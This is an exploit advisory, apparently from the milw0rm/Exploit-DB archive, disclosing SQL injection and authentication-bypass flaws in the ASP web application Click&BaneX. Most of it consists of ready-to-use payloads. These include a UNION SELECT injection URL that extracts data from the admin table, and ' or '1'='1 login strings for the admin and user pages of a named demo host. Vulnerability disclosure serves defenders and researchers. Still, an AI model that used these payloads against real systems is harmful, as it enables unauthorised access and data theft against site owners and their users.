Click&BaneX - Multiple SQL Injections

EDB-ID:

7484

CVE:

N/A

Author:

AlpHaNiX

Type:

webapps

Platform:

ASP

Published:

2008-12-15

###########################################################################
#-------------------------------AlpHaNiX----------------------------------#
###########################################################################

#Found By : AlpHaNiX
#website  : www.offensivetrack.org
#contact  : AlpHa[AT]HACKER[DOT]BZ

###########################################################################

#script   : Click&BaneX
#download : null
#Demo     :  http://icash.ch/ClickAndBanexDemo/user/  %00 http://icash.ch/ClickAndBanexDemo/admin/

###########################################################################

#Exploits :

--=[SQL INJECTION]=--
http://icash.ch/ClickAndBanexDemo/user/user_menu.asp?user=wd2505&ID=0+union+select+1,2,3,4,5,6,7,9,10,11,12,13,15,16,17+from+admin%00


##########################################################################

--=[AUTH BYPASS]=--

-----ADMIN PAGE----
http://icash.ch/ClickAndBanexDemo/admin/admin_menu.asp

USERNAME  : ' or '1'='1
PASSWORD : ' or '1'='1


-----USER PAGE----
http://icash.ch/ClickAndBanexDemo/user/user_menu.asp
USERNAME  : ' or '1'='1
PASSWORD : ' or '1'='1


#Greetz For My Best Friend ZIGMA

###########################################################################

# milw0rm.com [2008-12-15]